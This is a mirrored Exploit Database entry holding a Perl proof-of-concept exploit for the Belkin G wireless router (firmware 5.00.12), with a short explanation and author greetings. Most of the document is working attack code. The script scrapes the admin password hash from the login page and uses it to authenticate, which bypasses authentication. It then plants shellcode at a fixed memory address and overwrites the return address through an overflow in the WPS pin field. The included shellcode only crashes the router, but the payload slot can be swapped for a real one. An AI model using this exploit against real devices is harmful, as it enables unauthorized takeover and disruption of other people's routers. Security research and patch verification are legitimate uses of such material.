Belkin G Wireless Router Firmware 5.00.12 – Remote Code Execution

• Exploit Database
• 37 阅读

• 作者： Aodrulez
  日期： 2013-08-26
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/27873/

• +-----------------------------------+
  | Belkin G Wireless Router RCE PoC. |
  +-----------------------------------+
  
  
  
  Firmware Version : 5.00.12 (Sep 10 2009 19:54:12)
  Boot Version : 1.18
  Hardware : F5D7234-4 v5 (01)
  Author : Aodrulez.
  Email: atul.alex@orchidseven.com
  Twitter: http://twitter.com/Aodrulez
  
   
  +---------+
  | Details |
  +---------+
   
  The exploit works in 3 stages.
  1. Authentication.
  2. Setting up shellcode in the memory at a known location.
  3. Triggering an RA register over-write to execute the shellcode.
   
  This particular model of router is based on 'embedded Configurable operating system' a.k.a (eCos) version 2.0. The shellcode used in the exploit is a dummy one that basically just triggers an exception & crashes the router, forcing it to reboot.
  
  
  Video Demo :
  http://www.youtube.com/watch?v=MtrYs-f6X3E
  
  
  +---------+
  | Exploit |
  +---------+
  
  #!/usr/bin/perl
  
  use strict;
  use warnings;
  use LWP 5.64;
  $| = 1;
  
  # Variable declarations.
  my $browser = LWP::UserAgent->new;
  my $passHash="";
  my $url ="";
  my $response ="";
  my $ip="";
  $browser ->timeout(10);
  
  
  # Just a few nops followed by a dummy shellcode that crashes & reboots the router.
  my $shellcode="\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x04\xd0\xff\xff\x20\x20\x20\x20";
  
  
  
  sub Authenticate()
  {
  print "[+] Trying to authenticate.\n";
  $url= "http://$ip/login.stm";
  $response = $browser->get( $url);
  my @aod= $response->content =~ m/var password = "(.*)";/g;
  if(!$aod[0])
  {
  	 print "[-] Damn! Something went wrong. This might not work here :-/\n";
  	 exit;
  }
  else
  {
  	 $passHash=$aod[0];
  	 print "[+] Admin Password = $passHash (MD5 Hash).\n";
  }
  
   print "[+] Time to authenticate you!\n";
   $url = "http://$ip/cgi-bin/login.exe";
   $response = $browser->post( $url,
  [ 'totalMSec' => "1377121454.99",
  'pws' => "$passHash",
  ,]
  );
  
  if( $response->content =~ /index/ ) 
  {
  print "[+] Logged in successfully as 'Admin'!\n";
  print "[!] Open this link in a browser for admin access : http://$ip/setup.htm \n";
  } else {
  print "[-] Login failed! This might not work here :-/\n";
  exit;
  }
  
  print "\n[+] Continue with exploitation? (Y/N) : ";
  my $temp=<STDIN>;
  if ($temp=~"Y" || $temp=~"y")
  {
  Exploit();
  }
  else
  {
  print "[+] Have fun!\n\n";
  exit;
  }
  }
  
  
  sub Exploit()
  {
  # Stage 1: Fill shellcode at a known location : 0x803c0278 (Buffer=120 bytes)
  # 0x803c0278 is fixed for this device/firmware combination.
  print "[+] Stage 1 : Allocating shellcode.\n";
  
  if (length($shellcode) > 120)
  {
   print "[-] Shellcode is too big! (120 bytes Max)\n";
   exit;
  }
  print "[+] Shellcode length : ".length($shellcode)."\n";
  
  # Fill the rest with nops. Not needed but good to have.
  # Shellcode size should be ideally a multiple of 4 as this is MIPS.
  my $nopsize=120-length($shellcode);
  $shellcode=$shellcode.("\x20"x$nopsize);
  
   $url = "http://$ip/cgi-bin/wireless_WPA.exe";
   $response = $browser->post( $url,
  [ 'wpa_authen' => "1",
  'wpa_psk' => '0',
  's_rekeysec' => '900000',
  's_rekeypkt' => '1000',
  'w802_rekey' => '0',
  'encryption' => '3',
  'security_type' => '4',
  'authentication' => '3',
  'encryption_hid' => '3',
  'wpa_key_text' => "ssss",
  'wpa_key_pass' => "$shellcode",
  'obscure_psk' => '1',
  'sharedkey_alter' => '',
  'sharedkey_alter1' => '1',
  
  ,]
  );
   
  if( !$response->content ) 
  {
   print "[-] Damn! Something went wrong. This might not work here :-/\n";
  }
  else 
  { 
  print "[+] Stage 1 seems to have gone well.\n";
  }
  
  # Stage 2: Trigger Stack Overflow & overwrite RA
  print "[+] Stage 2 : Triggering Return Address overwrite.\n";
  
  my $junk="A"x32;
  my $s0="BBBB";
  my $s1="CCCC";
  my $ra="\x78\x02\x3c\x80"; #EPC -> 0x803c0278 Fixed for this device/firmware combination.
  my $nop="\x20\x20\x20\x20";
  my $payload=$junk.$s0.$s1.$ra.$nop;
  
   $url = "http://$ip/cgi-bin/wireless_WPS_Enroll.exe";
   $response = $browser->post( $url,[ 'pin' => "$payload"]);
   if( !$response->content ) 
  {
  print "[-] Damn! Something went wrong. This might not work here :-/\n";
  } 
   else 
   {
  print "[-] Done! \\m/\n";
   }
  
  }
  
  sub Welcome()
  {
  print "\n\n+------------------------------------------+\n";
  print "|Belkin G Wireless Router Remote Exploit |\n";
  print "| (Authentication bypass & RCE PoC)|\n";
  print "+------------------------------------------+\n";
  print "[+] By Aodrulez.\n";
  print "\n[+] Usage : perl $0 router_ip";
  print "\n[!] Example : perl $0 192.168.2.1";
  
  if (!$ARGV[0])
  {
  print "\n[-] (o_0) Seriously??\n";
  exit;
  }
  
  $ip=$ARGV[0];
  print "\n[+] Target IP : $ip\n";
  
  }
  
  # Burn!!
  Welcome();
  Authenticate();
  # End of exploit code.
  
  
  
  +-------------------+
  | Greetz Fly Out To |
  +-------------------+
   
  
  1] Amforked(): My Mentor.
  2] The Blue Genius : My Boss.
  3] str0ke (milw0rm)
  4] www.orchidseven.com
  5] www.malcon.org
  6] www.nsd.org.in
   
   
  +-------+
  | Quote |
  +-------+
   
  “I would rather die of passion than of boredom.” - Vincent van Gogh.